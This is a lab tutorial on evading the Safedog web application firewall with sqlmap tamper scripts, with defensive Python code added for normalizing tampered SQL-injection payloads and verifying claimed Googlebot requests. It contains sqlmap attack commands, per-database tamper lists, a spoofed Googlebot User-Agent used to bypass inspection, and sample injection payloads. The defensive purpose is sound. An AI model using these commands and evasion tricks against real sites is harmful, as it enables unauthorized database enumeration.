Automating WAF (Safedog) bypass with sqlmap

Enterprises typically deploy an intrusion prevention system (IPS) or a web application firewall (WAF) to defend against web attacks.

sqlmap ships with a large number of bypass scripts that rewrite each payload it sends into an evasion variant. They live in the tamper/ directory and are enabled with the --tamper option, for example --tamper=between,randomcase.

General-purpose set:

--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

If the database is MSSQL:

--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

If the database is MySQL:

--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
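Most of the tamper scripts listed above do not change what the SQL does; they change only how it looks on the wire (letter case, whitespace, comments, percent-encoding, operator spelling). That is why a signature that matches the raw request string misses them and why a WAF should normalize each parameter value before matching. The following Python script is an added defender-side example, not code from this page or from sqlmap: normalize() undoes randomcase, space2comment, charencode/chardoubleencode/percentage, multiplespaces, space2plus, equaltolike and the MySQL version-comment form used by modsecurityversioned, detect() applies a few simple rules to the normalized value, and naive_match() shows what a case-sensitive raw-string signature sees instead. The sample query strings and the rule names are constructed for the demonstration.

```python
import re
import urllib.parse
from typing import List

# Constructed sample query strings (not taken from the page). Each tampered
# entry is the same boolean-blind probe rewritten the way the named sqlmap
# tamper script would rewrite it; "benign" is an ordinary request.
SAMPLES = {
    "plain":            "id=1' AND 1=1-- -",
    "randomcase":       "id=1' aNd 1=1-- -",
    "space2comment":    "id=1'/**/AND/**/1=1--/**/-",
    "charencode":       "id=1%27%20AND%201%3D1--%20-",
    "chardoubleencode": "id=1%2527%2520AND%25201%253D1--%2520-",
    "multiplespaces":   "id=1'     AND    1=1--   -",
    "space2plus":       "id=1'+AND+1=1--+-",
    "equaltolike":      "id=1' AND 1 LIKE 1-- -",
    "versioned":        "id=1'/*!50000AND*/ 1=1-- -",
    "benign":           "id=42&page=2",
}

# Hypothetical rule set; a real WAF would carry far more than three patterns.
RULES = {
    "boolean_tautology":  re.compile(r"['\"]\s*(?:and|or)\s+\w+\s*=\s*\w+"),
    "union_select":       re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "comment_terminator": re.compile(r"['\"].*?(?:--|#)"),
}


def normalize(value: str, max_decode_rounds: int = 3) -> str:
    """Canonicalize a parameter value so that tamper-style rewrites collapse
    back onto the same string the attacker started from."""
    s = value
    for _ in range(max_decode_rounds):            # charencode, percentage, chardoubleencode
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    s = s.replace("+", " ")                       # space2plus (form-encoded space)
    s = re.sub(r"/\*!\d*", " ", s)                # opener of MySQL /*!50000 ... */ version comments
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # space2comment and similar inline comments
    s = s.replace("*/", " ")                      # closer left behind by the version-comment opener
    s = s.lower()                                 # randomcase
    s = re.sub(r"\s*\blike\b\s*", "=", s)         # equaltolike
    s = re.sub(r"\s+", " ", s).strip()            # multiplespaces, space2randomblank
    return s


def detect(query_string: str) -> List[str]:
    """Normalize every parameter value and return the names of matching rules."""
    hits = set()
    for pair in query_string.split("&"):
        _, _, raw_value = pair.partition("=")
        value = normalize(raw_value)
        for name, pattern in RULES.items():
            if pattern.search(value):
                hits.add(name)
    return sorted(hits)


def naive_match(query_string: str) -> bool:
    """A raw, case-sensitive signature with no normalization, for contrast."""
    return re.search(r"' AND \w+=\w+", query_string) is not None


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:18} naive={naive_match(sample)!s:5} normalized={detect(sample)}")
```

Every tampered sample normalizes to the same string as the plain probe, so one rule catches all of them, while the naive signature fires only on the untouched request. The normalization must run on the decoded parameter values, not on the raw request line, and it must run regardless of which User-Agent the request carries.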

Below we demonstrate how these scripts are used.

Lab setup: Windows Server 2008 with DVWA / Kali Linux with sqlmap / Safedog 4.0, Apache edition.

We will test blind SQL injection.

First the usual approach: throw a batch of tamper scripts at it and see what happens:

sqlmap -r burp.log --dbs --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords, --level=5 --risk=3 -p id --dbms=mysql --flush-session

Although this sometimes works, it still falls flat against a Windows host running Safedog. A purpose-built script is needed, and someone has already written one:

http://flag0.com/2018/04/20/bypass%E5%AE%89%E5%85%A8%E7%8B%97/

Copy the script into the tamper directory.

Then run from the terminal:

sqlmap -r burp.log --dbs --tamper=safedog --level=5 --risk=3 -p id --dbms=mysql --flush-session --user-agent="Mozilla/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)"

The database names were enumerated quickly and without interruption.
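The last command also sets the User-Agent to a Googlebot string. That header is chosen by the client, so any WAF rule that relaxes inspection for requests claiming to be a search-engine crawler can be satisfied by anyone. The way to honour genuine crawlers without trusting the header is the check Google itself documents: reverse-resolve the source IP, require the name to end in googlebot.com or google.com, then forward-resolve that name and require it to map back to the same IP. The following Python script is an added example, not code from this page or from any WAF product; the DNS lookups are injectable so the demo runs offline against a constructed table built from documentation address ranges, and the function names are hypothetical.

```python
import socket

# Domains Google documents for the reverse-DNS names of its crawlers.
GOOGLE_CRAWLER_DOMAINS = ("googlebot.com", "google.com")

# The User-Agent string from the sqlmap command on this page.
GOOGLEBOT_UA = "Mozilla/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)"


def _default_reverse(ip: str) -> str:
    return socket.gethostbyaddr(ip)[0]


def _default_forward(hostname: str) -> str:
    return socket.gethostbyname(hostname)


def claims_googlebot(user_agent: str) -> bool:
    """Does the request merely *say* it is Googlebot? Proves nothing by itself."""
    return "googlebot" in (user_agent or "").lower()


def verify_googlebot(ip: str, reverse_lookup=_default_reverse, forward_lookup=_default_forward) -> bool:
    """True only if rDNS(ip) is under a Google crawler domain AND forward DNS of
    that name returns the same ip. Either lookup failing means 'not verified'."""
    try:
        host = reverse_lookup(ip).lower().rstrip(".")
        # Suffix check must include the dot, so "googlebot.com.example.net" is rejected.
        if not any(host == d or host.endswith("." + d) for d in GOOGLE_CRAWLER_DOMAINS):
            return False
        return forward_lookup(host) == ip
    except (OSError, KeyError):
        return False


def classify(ip: str, user_agent: str, reverse_lookup=_default_reverse, forward_lookup=_default_forward) -> str:
    """'normal' requests get ordinary inspection; only 'verified-crawler' may be
    treated specially; 'spoofed-crawler' is a strong signal worth alerting on."""
    if not claims_googlebot(user_agent):
        return "normal"
    return "verified-crawler" if verify_googlebot(ip, reverse_lookup, forward_lookup) else "spoofed-crawler"


# Constructed DNS tables using documentation ranges; none of these are real Google addresses.
FAKE_RDNS = {
    "192.0.2.10":   "crawl-192-0-2-10.googlebot.com",
    "203.0.113.9":  "host-9.attacker.example.net",
    "198.51.100.7": "crawl-198-51-100-7.googlebot.com",  # name looks right, forward DNS disagrees
}
FAKE_FWD = {
    "crawl-192-0-2-10.googlebot.com":   "192.0.2.10",
    "host-9.attacker.example.net":      "203.0.113.9",
    "crawl-198-51-100-7.googlebot.com": "192.0.2.10",
}


def demo_classify(ip: str, user_agent: str) -> str:
    """classify() wired to the constructed tables so the example runs offline."""
    return classify(ip, user_agent, FAKE_RDNS.__getitem__, FAKE_FWD.__getitem__)


if __name__ == "__main__":
    for ip in ("192.0.2.10", "203.0.113.9", "198.51.100.7", "198.51.100.8"):
        print(ip, demo_classify(ip, GOOGLEBOT_UA))
```

The forward-confirmation step is what defeats an attacker who controls the reverse zone for their own address space: they can make the PTR record say googlebot.com, but they cannot make Google's forward zone point that name at their IP. A request that fails this check while carrying a crawler User-Agent deserves full inspection, not an exemption.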
